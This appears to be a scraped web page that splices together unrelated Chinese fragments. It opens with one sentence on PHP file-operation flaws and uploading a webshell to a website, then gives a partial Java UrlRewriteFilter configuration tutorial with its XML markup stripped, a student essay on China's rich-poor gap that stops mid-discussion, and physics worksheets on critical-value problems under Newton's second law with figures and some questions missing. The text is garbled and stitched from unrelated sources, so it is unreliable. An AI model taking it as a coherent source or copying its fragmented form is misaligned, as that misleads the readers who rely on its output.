好啦，到现在大家有没有发现这几个漏洞都是跟文件或文件夹的操作有关呢？想要渗透一个网站拿到webshell肯定要上传webshell了也就是对文件的操作了，那就关涉到PHP 的文件操作函数。

伪静态_URLRewrite实例解析

Url Rewrite Filter实现页面伪静态化，简单实例及步骤1.首先新建一个Web Project 本例把它命名为：UrlRewrite，在创建的时候，选择勾选“Add JSTL libraries to WEB-INF/lib folder ”(注：因为项目中会用到jstl 核心标签库)，然后再把urlrewrite-2.6.0.jar 导入到项目Bulid Path路径下，最后再加入struts框架。 2.配置web.xml文件 把如下代码加入到web.xml配置文件中，更多的配置可参考官方文档： UrlRewriteFilter org.tuckey.web.filters.urlrewrite.UrlRewriteFilter logLevel WARN UrlRewriteFilter /* 3.新增urlrewrite.xml文件 ^/([0-9]+).html$ /index.jsp?id=$1 在WEB-INF目录下新建一个Url Rewrite Filter的规则配置文件，默认命名为

当前中国贫富两极分化的原因分析及其调整策略

当前中国贫富两极分化的原因分析及其调整策略 贫富分化---中国不能承受之重改革开放以来，中国在减轻贫困和贫富差距上取得的成果归功于快速发展策略，但城乡贫富差距、地区贫富差距和贫困仍然是中国所面临的严峻问题。这不但是经济学研究的一个重要内容，同时也是政治学理论必须正视的一个现实问题。我们小组成员主要从政治学角度具体分析、讨论形成社会两极分化的原因，并提出了解决由贫富差距和地区发展不平衡引起的社会两极分化问题的一些对策，以期健全公平的社会主义市场经济体制和完善的社会保障体制。 首先，对于什么是贫富分化，我们小组都有一个共同的了解和认识，就是：贫富差距是指由于各个社会成员所处的具体社会政治、经济和文化方面的地位和环境不同，而形成的实际占有社会财富的差距。它表现为一定量的物质财富和精神财富。贫富差距包括收入差距和财富差距两部分。 其次，对于中国当前贫富差距现状及其表现，我们小组结合网上所所查的资料和所学的政治经济学有关的知识，我们主要归结为以下几个方面： （一）城乡居民的收入差距呈扩大化趋势。最近，中国社科院在发布的《人口与劳动绿皮书（2008）》其中指出，中国城乡居民收入差距出现全方位扩大。在过去的十几年里，我国城乡居民收入的绝对额差距增加了近12倍。数据显示，1978年至2007年间，中国城镇居民人均实际可支配收入增加了7.5倍，农村居民人均纯收入增加

了7.3倍。但1990年以来农民收入的增幅明显低于城镇居民，二者之间绝对额的差距逐年扩大。2007年是改革开放以来差距最大的一年，城乡居民收入比却扩大到3.33∶1，绝对差距达到9646元。 （二）除了城乡之间，我国各行业之间收入差距也在明显加大。由于在市场经济发展过程中存在如法制不够健全、市场竞争机制不够完善等弊端，另外，又由于国家政策的相关保护，从而导致行业垄断现象仍然存在。当前，垄断行业主要包括电力、电信、民航、铁路、石化、金融、保险、烟草、煤炭、房地产等部门。这些垄断性行业凭借垄断经营的特权及国家政府的特殊保护，与其他行业进行不公平竞争，从而取得高额垄断利润，使行业间差距不断扩大。 （三）区域间贫富差距扩大。区域间的贫富差距主要表现在东部和西部之间的贫富差距。据国家统计局数字表明，1999年，东部地区人均GDP为10732元人民币，西部地区为4302元；到2005 年，东部地区人均GDP为22200元，西部地区为8970元。6年间，东西部人均GDP差距由6430 元扩大到13230 元，增加了1倍多。2006年，西部12个省市自治区GDP总和不到人民币4万亿元，约占全国GDP 的17%；而东部地区GDP达到2万亿元的省份就有3个，其中江苏省为21500亿元，山东省为22000亿元，广东省为25000亿元。从这一组数据不难发现东西部之间的差距的明显。 最后，我们对于我们的主题----当前中国贫富两极分化的原因分析及其调整策略，展开了讨论。 讨论记录如下：

专题五 牛顿第二定律中的临界和极值问题

专题五 牛顿运动定律的应用 ——临界和极值问题 一、概念 （1）临界问题：某种物理现象（或物理状态）刚好要发生或刚好不发生的转折状态。 （2）极值问题：在满足一定的条件下，某物理量出现极大值或极小值的情况。 二、关键词语 在动力学问题中出现的“最大”、“最小”、“刚好”、“恰能”等词语，一般都暗示了临界状态的出现，隐含了相应的临界条件。有些物理过程中没有明显出现临界问题的线索，但在变化过程中可能出现临界问题，也可能不出现临界问题，解答这类问题一般用假设法。 三、常见类型 动力学中的常见临界问题主要有三类：一是弹力发生突变时接触物体间的脱离与不脱离的问题；二是绳子的绷紧与松弛问题；三是摩擦力发生突变的滑动与不滑动问题。 四、解题关键 解决此类问题的关键是对物体运动情况的正确描述，对临界状态的判断与分析，找出处于临界状态时存在的独特的物理关系，即临界条件。 常见的三类临界问题的临界条： 1、 相互接触的两个物体将脱离的临界条件是：相互作用的弹力为零。 2、 绳子松弛的临界条件是：绳子的拉力为零。 3、 存在静摩擦的系统，相对滑动与相对静止的临界条件是：静摩擦力达到最大值。 五、例题解析 【例题1】质量为0.2kg 的小球用细线吊在倾角为θ=60°的斜面体的顶端，斜面体静止时，小球紧靠在斜面上，线与斜面平行，如图所示，不计摩擦，求在下列三种情况下，细线对小球的拉力（取g =10 m/s 2） (1) 斜面体以23m/s 2的加速度向右加速运动； (2) 斜面体以43m/s 2，的加速度向右加速运动； 【例题2】如图所示，轻绳AB 与竖直方向的夹角θ=37°，绳BC 水平，小球质量m =0.4 kg ，取g =10m/s 2。试求： （1）小车以a 1=2.5m/s 2的加速度向右做匀加速运动时，绳AB 的张力是多少？ （2）小车以a 2=8m/s 2的加速度向右做匀加速运动时，绳AB 的张力是多少？

牛顿第二定律的应用临界问题与极值问题

值 2．中学阶段常见的临界问题归纳： 3．掌握临界问题的基本思路：

①仔细审题，认真分析研究对象所经历的物理过程，找到临界状态 ②找到重要物理量的变化规律，找出临界条件 ③根据临界条件列方程求解 【典型题例】 例1：有一质量M=4kg的小车置于光滑水平桌面上，在小车上放一质量m=6kg 的物块，动摩擦因素μ=0.2,现对物块施加F=25N的水平拉力,如图所示，求小车的加速度？（设车与物块之间的最大静摩擦力等于滑动摩擦力且g取10m/s2) 例2．托盘A托着质量为m的重物B，B 挂在劲度系数为k的弹簧下端，弹簧的上端悬挂于O点，开始时弹簧竖直且为原长，今让托盘A竖直向下做初速为零的匀加速运动，其加速度为a，求经过多长时间，A与B开始分离（a g）． 例3．如图，光滑斜面质量为M=8 kg，小球m=2kg，用细绳悬挂相对静止在斜面上，求： (1)用多大的水平力F推斜面时，绳中的张力为零? (2)用多大的水平力F推斜面时，小球对斜面的压力为零? 例4：如图所示，m=4kg的小球挂在小车后壁上，细线与竖直方向成37°角。求： （1）小车以a=g向右加速； （2）小车以a=g向右减速时，细线对小球的拉力F1和后壁对小球的压力F2各多大？ 牛顿第二定律专题（二）—临界问题与极值问题针对训练 一、选择题（第1到第4为单选题，第5到第8题为多选题） 1．如图在前进的车厢的竖直后壁上放一个物体，物体与后壁间的滑动摩擦系数为μ，设最大静摩擦力等于滑动摩擦力．要使物体不下滑，车厢至少应以多大的加速度前进() A．g/μ B．gμ C．μ/g D．g 2．如图5所示，质量为M的木板，上 O B A 例2题 例1